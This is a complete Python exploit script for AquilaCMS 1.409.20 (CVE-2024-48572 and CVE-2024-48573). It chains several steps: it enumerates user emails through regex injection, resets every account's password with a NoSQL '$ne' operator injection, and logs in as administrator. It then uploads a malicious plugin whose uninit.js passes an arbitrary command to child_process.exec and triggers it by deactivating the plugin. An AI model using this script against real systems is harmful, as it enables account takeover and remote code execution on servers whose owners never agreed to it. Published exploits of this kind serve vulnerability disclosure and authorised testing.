# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE) # Date: 2024-10-25 # Exploit Author: Eui Chul Chung # Vendor Homepage: https://www.aquila-cms.com/ # Software Link: https://github.com/AquilaCMS/AquilaCMS # Version: v1.409.20 # CVE: CVE-2024-48572, CVE-2024-48573 import io import json import uuid import string import zipfile import argparse import requests import textwrap def unescape_special_characters(email): return ( email.replace("[$]", "$") .replace("[*]", "*") .replace("[+]", "+") .replace("[-]", "-") .replace("[.]", ".") .replace("[?]", "?") .replace(r"[\^]", "^") .replace("[|]", "|") ) def get_user_emails(): valid_characters = list( string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~" ) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"] emails_found = [] next_emails = ["^"] while next_emails: prev_emails = next_emails next_emails = [] for email in prev_emails: found = False for ch in valid_characters: data = {"email": f"{email + ch}.*"} res = requests.put(f"{args.url}/api/v2/user", json=data) if json.loads(res.text)["code"] == "UserAlreadyExist": next_emails.append(email + ch) found = True if not found: emails_found.append(email[1:]) print(f"[+] {unescape_special_characters(email[1:])}") return emails_found def reset_password(email): data = {"email": email} requests.post(f"{args.url}/api/v2/user/resetpassword", json=data) data = {"token": {"$ne": None}, "password": args.password} requests.post(f"{args.url}/api/v2/user/resetpassword", json=data) print(f"[+] {unescape_special_characters(email)} : {args.password}") def get_admin_auth_token(emails): for email in emails: data = {"username": email, "password": args.password} res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data) if res.status_code == 200: print(f"[+] Administrator account : {unescape_special_characters(email)}") return json.loads(res.text)["data"] return None def create_plugin(plugin_name): payload = textwrap.dedent( f""" const {{ exec }} = require("child_process"); /** * This function is called when the plugin is desactivated or when we delete it */ module.exports = async function (resolve, reject) {{ try {{ exec("{args.command}"); return resolve(); }} catch (error) {{}} }}; """ ).strip() plugin = io.BytesIO() with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file: zip_file.writestr( f"{plugin_name}/package.json", io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(), ) zip_file.writestr( f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue() ) zip_file.writestr( f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue() ) plugin.seek(0) return plugin def rce(emails): auth_token = get_admin_auth_token(emails) if auth_token is None: print("[-] Administrator account not found") return print("[+] Create malicious plugin") plugin_name = uuid.uuid4().hex plugin = create_plugin(plugin_name) print("[+] Upload plugin") headers = {"Authorization": auth_token} files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")} requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files) print("[+] Find uploaded plugin") headers = {"Authorization": auth_token} data = {"PostBody": {"limit": 0}} res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data) plugin_id = None for data in json.loads(res.text)["datas"]: if data["name"] == plugin_name: plugin_id = data["_id"] print(f"[+] Plugin ID : {plugin_id}") break if plugin_id is None: print("[-] Plugin not found") return print("[+] Deactivate plugin") headers = {"Authorization": auth_token} data = {"idModule": plugin_id, "active": False} res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data) if res.status_code == 200: print("[+] Command execution succeeded") else: print("[-] Command execution failed") def main(): print("[*] Retrieve email addresses") emails = get_user_emails() print("\n[*] Reset password") for email in emails: reset_password(email) print("\n[*] Perform remote code execution") rce(emails) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument( "-u", dest="url", help="Site URL (e.g. www.aquila-cms.com)", type=str, required=True, ) parser.add_argument( "-p", dest="password", help="Password to use for password reset (e.g. HaXX0r3d!)", type=str, default="HaXX0r3d!", ) parser.add_argument( "-c", dest="command", help="Command to execute (e.g. touch /tmp/pwned)", type=str, default="touch /tmp/pwned", ) args = parser.parse_args() main()